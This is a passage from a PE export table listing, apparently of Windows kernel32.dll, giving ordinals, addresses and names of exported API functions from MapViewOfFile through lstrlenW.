   0x025B  0x0000B995 "MapViewOfFile"

   0x025C  0x0000B926 "MapViewOfFileEx"

   0x025D  0x00065240 "Module32First"

   0x025E  0x00065187 "Module32FirstW"

   0x025F  0x000653C5 "Module32Next"

   0x0260  0x00065324 "Module32NextW"

   0x0261  0x00035EA7 "MoveFileA"

   0x0262  0x0005E3CB "MoveFileExA"

   0x0263  0x00035673 "MoveFileExW"

   0x0264  0x00021249 "MoveFileW"

   0x0265  0x00035EC6 "MoveFileWithProgressA"

   0x0266  0x0001F716 "MoveFileWithProgressW"

   0x0267  0x00009856 "MulDiv"

   0x0268  0x00009C88 "MultiByteToWideChar"

   0x0269  0x00014FEC "NlsConvertIntegerToString"

   0x026A  0x00035831 "NlsGetCacheUpdateCount"

   0x026B  0x000773E9 "NlsResetProcessLocale"

   0x026C  0x00060FDA "NumaVirtualQueryNode"

   0x026D  0x00011071 "OpenConsoleW"

   0x026E  0x0002AD80 "OpenDataFile"

   0x026F  0x0001329C "OpenEventA"

   0x0270  0x000131D0 "OpenEventW"

   0x0271  0x0002196A "OpenFile"

   0x0272  0x0000BC06 "OpenFileMappingA"

   0x0273  0x0000BB6A "OpenFileMappingW"

   0x0274  0x0006C3D8 "OpenJobObjectA"

   0x0275  0x0006C260 "OpenJobObjectW"

   0x0276  0x0000EAAB "OpenMutexA"

   0x0277  0x0000EA25 "OpenMutexW"

   0x0278  0x000309D1 "OpenProcess"

   0x0279  0x00033337 "OpenProfileUserMapping"

   0x027A  0x0002CA3F "OpenSemaphoreA"

   0x027B  0x0002E307 "OpenSemaphoreW"

   0x027C  0x0002FBF0 "OpenThread"

   0x027D  0x00062B30 "OpenWaitableTimerA"

   0x027E  0x000629C5 "OpenWaitableTimerW"

   0x027F  0x0005AC7C "OutputDebugStringA"

   0x0280  0x0005B335 "OutputDebugStringW"

   0x0281  0x000744AD "PeekConsoleInputA"

   0x0282  0x000744D0 "PeekConsoleInputW"

   0x0283  0x00060817 "PeekNamedPipe"

   0x0284  0x00012782 "PostQueuedCompletionStatus"

   0x0285  0x0006C0C8 "PrepareTape"

   0x0286  0x00020047 "PrivCopyFileExW"

   0x0287  0x0005DFF1 "PrivMoveFileIdentityW"

   0x0288  0x00064DF5 "Process32First"

   0x0289  0x00064D3C "Process32FirstW"

   0x028A  0x00064F68 "Process32Next"

   0x028B  0x00064EC7 "Process32NextW"

   0x028C  0x00013019 "ProcessIdToSessionId"

   0x028D  0x0002C056 "PulseEvent"

   0x028E  0x00066CE5 "PurgeComm"

   0x028F  0x0001636B "QueryActCtxW"

   0x0290  0x000091CB "QueryDepthSList"

   0x0291  0x0005D274 "QueryDosDeviceA"

   0x0292  0x00021D75 "QueryDosDeviceW"

   0x0293  0x0002AFB1 "QueryInformationJobObject"

   0x0294  0x000395F0 "QueryMemoryResourceNotification"

   0x0295  0x0000A4B7 "QueryPerformanceCounter"

   0x0296  0x0002FA36 "QueryPerformanceFrequency"

   0x0297  0x0005C624 "QueryWin31IniFilesMappedToRegistry"

   0x0298  0x0002C07A "QueueUserAPC"

   0x0299  0x00030A52 "QueueUserWorkItem"

   0x029A  0x00012A99 "RaiseException"

   0x029B  0x00072A3D "ReadConsoleA"

   0x029C  0x000744F3 "ReadConsoleInputA"

   0x029D  0x00074539 "ReadConsoleInputExA"

   0x029E  0x0007455D "ReadConsoleInputExW"

   0x029F  0x00074516 "ReadConsoleInputW"

   0x02A0  0x00073825 "ReadConsoleOutputA"

   0x02A1  0x00073D45 "ReadConsoleOutputAttribute"

   0x02A2  0x00073CF9 "ReadConsoleOutputCharacterA"

   0x02A3  0x00073D1F "ReadConsoleOutputCharacterW"

   0x02A4  0x00073801 "ReadConsoleOutputW"

   0x02A5  0x00072A8C "ReadConsoleW"

   0x02A6  0x0003161F "ReadDirectoryChangesW"

   0x02A7  0x00001812 "ReadFile"

   0x02A8  0x0002BCF3 "ReadFileEx"

   0x02A9  0x0002DE49 "ReadFileScatter"

   0x02AA  0x000021D0 "ReadProcessMemory"

   0x02AB  0x00075AD9 "RegisterConsoleIME"

   0x02AC  0x000758E9 "RegisterConsoleOS2"

   0x02AD  0x00072AE2 "RegisterConsoleVDM"

   0x02AE  0x0001701E "RegisterWaitForInputIdle"

   0x02AF  0x000211B5 "RegisterWaitForSingleObject"

   0x02B0  0x0002B06E "RegisterWaitForSingleObjectEx"

   0x02B1  0x0005F562 "RegisterWowBaseHandlers"

   0x02B2  0x00068989 "RegisterWowExec"

   0x02B3  0x000130EF "ReleaseActCtx"

   0x02B4  0x000024B7 "ReleaseMutex"

   0x02B5  0x0000C03D "ReleaseSemaphore"

   0x02B6  0x0005C121 "RemoveDirectoryA"

   0x02B7  0x00036F73 "RemoveDirectoryW"

   0x02B8  0x000594AC "RemoveLocalAlternateComputerNameA"

   0x02B9  0x000593CB "RemoveLocalAlternateComputerNameW"

   0x02BA  0x000091E4 "RemoveVectoredExceptionHandler"

   0x02BB  0x00036C54 "ReplaceFile"

   0x02BC  0x0005F20F "ReplaceFileA"

   0x02BD  0x00036C54 "ReplaceFileW"

   0x02BE  0x00061A77 "RequestDeviceWakeup"

   0x02BF  0x000619FC "RequestWakeupLatency"

   0x02C0  0x0000A0CB "ResetEvent"

   0x02C1  0x0005F70B "ResetWriteWatch"

   0x02C2  0x0000920C "RestoreLastError"

   0x02C3  0x0003290F "ResumeThread"

   0x02C4  0x0000922B "RtlCaptureContext"

   0x02C5  0x00009243 "RtlCaptureStackBackTrace"

   0x02C6  0x00009262 "RtlFillMemory"

   0x02C7  0x00009276 "RtlMoveMemory"

   0x02C8  0x0000928A "RtlUnwind"

   0x02C9  0x0000929A "RtlZeroMemory"

   0x02CA  0x00074F41 "ScrollConsoleScreenBufferA"

   0x02CB  0x00074F65 "ScrollConsoleScreenBufferW"

   0x02CC  0x000217D2 "SearchPathA"

   0x02CD  0x0000E76C "SearchPathW"

   0x02CE  0x0007A7E3 "SetCPGlobal"

   0x02CF  0x00076AF6 "SetCalendarInfoA"

   0x02D0  0x00077D3B "SetCalendarInfoW"

   0x02D1  0x00059D03 "SetClientTimeZoneInformation"

   0x02D2  0x0006CB45 "SetComPlusPackageInstallStatus"

   0x02D3  0x00066D6F "SetCommBreak"

   0x02D4  0x00067E8B "SetCommConfig"

   0x02D5  0x00066D87 "SetCommMask"

   0x02D6  0x00066E26 "SetCommState"

   0x02D7  0x0006712E "SetCommTimeouts"

   0x02D8  0x00058690 "SetComputerNameA"

   0x02D9  0x000587A8 "SetComputerNameExA"

   0x02DA  0x0005860F "SetComputerNameExW"

   0x02DB  0x000584E9 "SetComputerNameW"

   0x02DC  0x00074AC8 "SetConsoleActiveScreenBuffer"

   0x02DD  0x00075163 "SetConsoleCP"

   0x02DE  0x000719E5 "SetConsoleCommandHistoryMode"

   0x02DF  0x0001B2AB "SetConsoleCtrlHandler"

   0x02E0  0x00072F0A "SetConsoleCursor"

   0x02E1  0x00074CA4 "SetConsoleCursorInfo"

   0x02E2  0x0007579F "SetConsoleCursorMode"

   0x02E3  0x00074C2A "SetConsoleCursorPosition"

   0x02E4  0x000730C0 "SetConsoleDisplayMode"

   0x02E5  0x00075005 "SetConsoleFont"

   0x02E6  0x00072D09 "SetConsoleHardwareState"

   0x02E7  0x0007507F "SetConsoleIcon"

   0x02E8  0x00071DC8 "SetConsoleInputExeNameA"

   0x02E9  0x0001B075 "SetConsoleInputExeNameW"

   0x02EA  0x00072D89 "SetConsoleKeyShortcuts"

   0x02EB  0x000756D9 "SetConsoleLocalEUDC"

   0x02EC  0x0008023B "SetConsoleMaximumWindowSize"

   0x02ED  0x00072E50 "SetConsoleMenuClose"

   0x02EE  0x0001AF10 "SetConsoleMode"

   0x02EF  0x000760F9 "SetConsoleNlsMode"

   0x02F0  0x00071745 "SetConsoleNumberOfCommandsA"

   0x02F1  0x0007172A "SetConsoleNumberOfCommandsW"

   0x02F2  0x0007595D "SetConsoleOS2OemFormat"

   0x02F3  0x00075281 "SetConsoleOutputCP"

   0x02F4  0x000731E9 "SetConsolePalette"

   0x02F5  0x00074BB0 "SetConsoleScreenBufferSize"

   0x02F6  0x00074F89 "SetConsoleTextAttribute"

   0x02F7  0x00071A81 "SetConsoleTitleA"

   0x02F8  0x0002D9B5 "SetConsoleTitleW"

   0x02F9  0x00074D71 "SetConsoleWindowInfo"

   0x02FA  0x000092AE "SetCriticalSectionSpinCount"

   0x02FB  0x000360F5 "SetCurrentDirectoryA"

   0x02FC  0x0000F37E "SetCurrentDirectoryW"

   0x02FD  0x00067BF1 "SetDefaultCommConfigA"

   0x02FE  0x00067AF9 "SetDefaultCommConfigW"

   0x02FF  0x0005FC4E "SetDllDirectoryA"

   0x0300  0x0005FBB8 "SetDllDirectoryW"

   0x0301  0x0003205E "SetEndOfFile"

   0x0302  0x00033490 "SetEnvironmentVariableA"

   0x0303  0x0001024E "SetEnvironmentVariableW"

   0x0304  0x0000AC9F "SetErrorMode"

   0x0305  0x0000A0A7 "SetEvent"

   0x0306  0x0003660E "SetFileApisToANSI"

   0x0307  0x0001CD9E "SetFileApisToOEM"

   0x0308  0x00012812 "SetFileAttributesA"

   0x0309  0x000314C5 "SetFileAttributesW"

   0x030A  0x00010C1E "SetFilePointer"

   0x030B  0x0002103F "SetFilePointerEx"

   0x030C  0x0005D7CC "SetFileShortNameA"

   0x030D  0x0005D6FF "SetFileShortNameW"

   0x030E  0x00031CA8 "SetFileTime"

   0x030F  0x0005D6A9 "SetFileValidData"

   0x0310  0x0005F4CF "SetFirmwareEnvironmentVariableA"

   0x0311  0x0005F3B4 "SetFirmwareEnvironmentVariableW"

   0x0312  0x00021454 "SetHandleContext"

   0x0313  0x0000CD27 "SetHandleCount"

   0x0314  0x0002E184 "SetHandleInformation"

   0x0315  0x0002CA97 "SetInformationJobObject"

   0x0316  0x000764F3 "SetLastConsoleEventActive"

   0x0317  0x000092D3 "SetLastError"

   0x0318  0x0005970B "SetLocalPrimaryComputerNameA"

   0x0319  0x000594F5 "SetLocalPrimaryComputerNameW"

   0x031A  0x00055C69 "SetLocalTime"

   0x031B  0x000768EB "SetLocaleInfoA"

   0x031C  0x00077E93 "SetLocaleInfoW"

   0x031D  0x0002CDD0 "SetMailslotInfo"

   0x031E  0x00061AC7 "SetMessageWaitingIndicator"

   0x031F  0x000313DC "SetNamedPipeHandleState"

   0x0320  0x0002C330 "SetPriorityClass"

   0x0321  0x00062034 "SetProcessAffinityMask"

   0x0322  0x00062144 "SetProcessDEPPolicy"

   0x0323  0x00062064 "SetProcessPriorityBoost"

   0x0324  0x0002C8E5 "SetProcessShutdownParameters"

   0x0325  0x000303C0 "SetProcessWorkingSetSize"

   0x0326  0x0001D363 "SetStdHandle"

   0x0327  0x000619B3 "SetSystemPowerState"

   0x0328  0x0005981A "SetSystemTime"

   0x0329  0x000599E0 "SetSystemTimeAdjustment"

   0x032A  0x0006C1FE "SetTapeParameters"

   0x032B  0x0006C026 "SetTapePosition"

   0x032C  0x00062BA4 "SetTermsrvAppInstallMode"

   0x032D  0x0002FA6A "SetThreadAffinityMask"

   0x032E  0x00063AA9 "SetThreadContext"

   0x032F  0x000392CD "SetThreadExecutionState"

   0x0330  0x00063D50 "SetThreadIdealProcessor"

   0x0331  0x0001B8DA "SetThreadLocale"

   0x0332  0x0000C198 "SetThreadPriority"

   0x0333  0x00063A34 "SetThreadPriorityBoost"

   0x0334  0x0001AF78 "SetThreadUILanguage"

   0x0335  0x000598BA "SetTimeZoneInformation"

   0x0336  0x0002B256 "SetTimerQueueTimer"

   0x0337  0x000449FD "SetUnhandledExceptionFilter"

   0x0338  0x00079C7C "SetUserGeoID"

   0x0339  0x000686F4 "SetVDMCurrentDirectories"

   0x033A  0x000618F5 "SetVolumeLabelA"

   0x033B  0x000613A1 "SetVolumeLabelW"

   0x033C  0x0006B071 "SetVolumeMountPointA"

   0x033D  0x0006A375 "SetVolumeMountPointW"

   0x033E  0x00009689 "SetWaitableTimer"

   0x033F  0x000666AA "SetupComm"

   0x0340  0x00072F84 "ShowConsoleCursor"

   0x0341  0x000366AE "SignalObjectAndWait"

   0x0342  0x0000BCF9 "SizeofResource"

   0x0343  0x00002446 "Sleep"

   0x0344  0x000023A0 "SleepEx"

   0x0345  0x0003974A "SuspendThread"

   0x0346  0x00010702 "SwitchToFiber"

   0x0347  0x000329AA "SwitchToThread"

   0x0348  0x00010BAC "SystemTimeToFileTime"

   0x0349  0x0002E991 "SystemTimeToTzSpecificLocalTime"

   0x034A  0x0006C2D7 "TerminateJobObject"

   0x034B  0x00001E1A "TerminateProcess"

   0x034C  0x0001CB23 "TerminateThread"

   0x034D  0x0001EFB6 "TermsrvAppInstallMode"

   0x034E  0x0006503A "Thread32First"

   0x034F  0x000650EE "Thread32Next"

   0x0350  0x00012E2F "TlsAlloc"

   0x0351  0x00013767 "TlsFree"

   0x0352  0x000097D0 "TlsGetValue"

   0x0353  0x00009C55 "TlsSetValue"

   0x0354  0x00064CFC "Toolhelp32ReadProcessMemory"

   0x0355  0x000312D5 "TransactNamedPipe"

   0x0356  0x000671D9 "TransmitCommChar"

   0x0357  0x0005FB56 "TrimVirtualBuffer"

   0x0358  0x000092EE "TryEnterCriticalSection"

   0x0359  0x0005A77B "TzSpecificLocalTimeToSystemTime"

   0x035A  0x0005FDF8 "UTRegister"

   0x035B  0x0007F14F "UTUnRegister"

   0x035C  0x00063E6A "UnhandledExceptionFilter"

   0x035D  0x000322D4 "UnlockFile"

   0x035E  0x00032313 "UnlockFileEx"

   0x035F  0x0000BA04 "UnmapViewOfFile"

   0x0360  0x00075BA6 "UnregisterConsoleIME"

   0x0361  0x0002BFF0 "UnregisterWait"

   0x0362  0x00030052 "UnregisterWaitEx"

   0x0363  0x000706C8 "UpdateResourceA"

   0x0364  0x000705C1 "UpdateResourceW"

   0x0365  0x00076504 "VDMConsoleOperation"

   0x0366  0x00068DF9 "VDMOperationStarted"

   0x0367  0x0007BAB5 "ValidateLCType"

   0x0368  0x00039810 "ValidateLocale"

   0x0369  0x0002EFAA "VerLanguageNameA"

   0x036A  0x0002F032 "VerLanguageNameW"

   0x036B  0x0000930F "VerSetConditionMask"

   0x036C  0x0001ABCE "VerifyConsoleIoHandle"

   0x036D  0x0005FD4E "VerifyVersionInfoA"

   0x036E  0x0001FB0E "VerifyVersionInfoW"

   0x036F  0x00009AE1 "VirtualAlloc"

   0x0370  0x00009B02 "VirtualAllocEx"

   0x0371  0x0005FB79 "VirtualBufferExceptionHandler"

   0x0372  0x00009B74 "VirtualFree"

   0x0373  0x00009B92 "VirtualFreeEx"

   0x0374  0x0002B127 "VirtualLock"

   0x0375  0x00001AD4 "VirtualProtect"

   0x0376  0x00001A61 "VirtualProtectEx"

   0x0377  0x0000BA61 "VirtualQuery"

   0x0378  0x0000BA30 "VirtualQueryEx"

   0x0379  0x0005F5E2 "VirtualUnlock"

   0x037A  0x0001337E "WTSGetActiveConsoleSessionId"

   0x037B  0x00067263 "WaitCommEvent"

   0x037C  0x0005B388 "WaitForDebugEvent"

   0x037D  0x0000A0ED "WaitForMultipleObjects"

   0x037E  0x000095BC "WaitForMultipleObjectsEx"

   0x037F  0x00002530 "WaitForSingleObject"

   0x0380  0x00002550 "WaitForSingleObjectEx"

   0x0381  0x00060B41 "WaitNamedPipeA"

   0x0382  0x0002C65C "WaitNamedPipeW"

   0x0383  0x0000A164 "WideCharToMultiByte"

   0x0384  0x000623AD "WinExec"

   0x0385  0x0001CC45 "WriteConsoleA"

   0x0386  0x000733E5 "WriteConsoleInputA"

   0x0387  0x00072EC4 "WriteConsoleInputVDMA"

   0x0388  0x00072EE7 "WriteConsoleInputVDMW"

   0x0389  0x00073408 "WriteConsoleInputW"

   0x038A  0x00073B65 "WriteConsoleOutputA"

   0x038B  0x00073F11 "WriteConsoleOutputAttribute"

   0x038C  0x00073EC5 "WriteConsoleOutputCharacterA"

   0x038D  0x00073EEB "WriteConsoleOutputCharacterW"

   0x038E  0x00073B41 "WriteConsoleOutputW"

   0x038F  0x0003549C "WriteConsoleW"

   0x0390  0x00010E17 "WriteFile"

   0x0391  0x0005D609 "WriteFileEx"

   0x0392  0x0002DD9D "WriteFileGather"

   0x0393  0x0005C984 "WritePrivateProfileSectionA"

   0x0394  0x0005C9CB "WritePrivateProfileSectionW"

   0x0395  0x00035D6C "WritePrivateProfileStringA"

   0x0396  0x0001EE34 "WritePrivateProfileStringW"

   0x0397  0x0005CD2B "WritePrivateProfileStructA"

   0x0398  0x0005CE6D "WritePrivateProfileStructW"

   0x0399  0x00002213 "WriteProcessMemory"

   0x039A  0x0005CFFD "WriteProfileSectionA"

   0x039B  0x0005D036 "WriteProfileSectionW"

   0x039C  0x0005CFC1 "WriteProfileStringA"

   0x039D  0x000332C9 "WriteProfileStringW"

   0x039E  0x0006C168 "WriteTapemark"

   0x039F  0x0006C6DB "ZombifyActCtx"

   0x03A0  0x000353E6 "_hread"

   0x03A1  0x00038AFF "_hwrite"

   0x03A2  0x00034E7C "_lclose"

   0x03A3  0x000365BD "_lcreat"

   0x03A4  0x0003541E "_llseek"

   0x03A5  0x0005F738 "_lopen"

   0x03A6  0x000353E6 "_lread"

   0x03A7  0x00038AFF "_lwrite"

   0x03A8  0x00034D59 "lstrcat"

   0x03A9  0x00034D59 "lstrcatA"

   0x03AA  0x00010FC2 "lstrcatW"

   0x03AB  0x00030D64 "lstrcmp"

   0x03AC  0x00030D64 "lstrcmpA"

   0x03AD  0x0000AA5C "lstrcmpW"

   0x03AE  0x0000BB31 "lstrcmpi"

   0x03AF  0x0000BB31 "lstrcmpiA"

   0x03B0  0x0000AA26 "lstrcmpiW"

   0x03B1  0x0000BE91 "lstrcpy"

   0x03B2  0x0000BE91 "lstrcpyA"

   0x03B3  0x0000BAF4 "lstrcpyW"

   0x03B4  0x000101A1 "lstrcpyn"

   0x03B5  0x000101A1 "lstrcpynA"

   0x03B6  0x0000BA7F "lstrcpynW"

   0x03B7  0x0000BE46 "lstrlen"

   0x03B8  0x0000BE46 "lstrlenA"

   0x03B9  0x00009A99 "lstrlenW"